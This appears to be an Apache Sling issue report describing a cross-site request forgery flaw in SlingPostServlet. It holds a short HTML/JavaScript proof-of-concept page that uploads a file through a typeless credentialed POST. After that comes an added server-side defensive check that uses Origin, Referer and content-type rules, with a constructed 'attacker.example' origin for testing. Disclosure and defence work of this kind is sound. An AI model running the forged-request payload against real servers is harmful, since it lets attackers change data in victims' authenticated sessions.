Description
The SlingPostServlet creates a resource from a cross-site request like so:
    <html>
      <body>
        <script>
          function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
            xhr.withCredentials = true;
            var body = "This file has been uploaded via CSRF.=\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input type="button" value="Submit request" onclick="submitRequest();" />
        </form>
      </body>
    </html>
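The page above sends a typeless Blob, so the browser emits no Content-Type header at all; a server-side CSRF check that only inspects the content type (as in the related JCR-4002) therefore never fires. The following is an added example of a defensive gate, not Sling's own ReferrerFilter or any code from this issue: it decides on the Origin header first, falls back to Referer, and treats a missing or empty Content-Type as browser-producible so that the request shape shown in this issue is rejected. The allowed-origin list, function names and request objects are assumptions constructed for illustration.

```javascript
// Added example of a server-side CSRF gate. Not Sling's own filter; the
// allowed origin and the request shapes below are constructed assumptions.

// Origins (scheme://host[:port]) from which state-changing requests are accepted.
const ALLOWED_ORIGINS = new Set(["http://localhost:8080"]);

// Content types a browser can send without a CORS preflight, i.e. from a
// plain <form> or from xhr.send() with a typeless body. An absent or empty
// Content-Type is treated as a member of this set on purpose: the PoC in
// this issue sends a Blob with no type, so the header is simply missing.
const SIMPLE_CONTENT_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
];

// Case-insensitive header lookup; returns "" when the header is absent.
function header(headers, name) {
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === name) return String(v).trim();
  }
  return "";
}

// Reduce a Referer URL to its origin, or null if it is absent or unparsable.
function originOfReferer(referer) {
  try {
    return new URL(referer).origin;
  } catch {
    return null;
  }
}

// True for empty/missing types and for the three "simple" form types.
function isSimpleContentType(contentType) {
  const base = contentType.split(";")[0].trim().toLowerCase();
  return base === "" || SIMPLE_CONTENT_TYPES.includes(base);
}

// Decide whether a state-changing request should be honoured.
// Returns { allowed: boolean, reason: string }.
function checkCsrf(method, headers, allowedOrigins = ALLOWED_ORIGINS) {
  if (["GET", "HEAD", "OPTIONS"].includes(method.toUpperCase())) {
    return { allowed: true, reason: "safe method" };
  }

  // 1. Origin is authoritative when the browser sends it.
  const origin = header(headers, "origin");
  if (origin) {
    return allowedOrigins.has(origin)
      ? { allowed: true, reason: "origin allowed" }
      : { allowed: false, reason: "origin not allowed" };
  }

  // 2. Otherwise fall back to the Referer's origin.
  const refOrigin = originOfReferer(header(headers, "referer"));
  if (refOrigin) {
    return allowedOrigins.has(refOrigin)
      ? { allowed: true, reason: "referer origin allowed" }
      : { allowed: false, reason: "referer origin not allowed" };
  }

  // 3. No origin information at all. A browser-producible (simple or empty)
  //    content type is exactly what a cross-site page can forge, so reject.
  if (isSimpleContentType(header(headers, "content-type"))) {
    return {
      allowed: false,
      reason: "no origin information and browser-producible content type",
    };
  }
  return { allowed: true, reason: "non-simple content type requires preflight" };
}

// Constructed request mirroring the PoC in this issue: cross-site POST,
// no Content-Type because the Blob carried no type.
const POC_REQUEST = { method: "POST", headers: { Origin: "http://attacker.example" } };

module.exports = { checkCsrf, isSimpleContentType, header, POC_REQUEST };
```

The ordering matters: deciding on Origin or Referer first means the content-type rule is only a backstop for clients that send neither, and the backstop errs on the side of rejecting, since a legitimate non-browser client can always set an explicit non-simple Content-Type.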
Attachments
Issue Links
- relates to JCR-4002: CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) (Closed)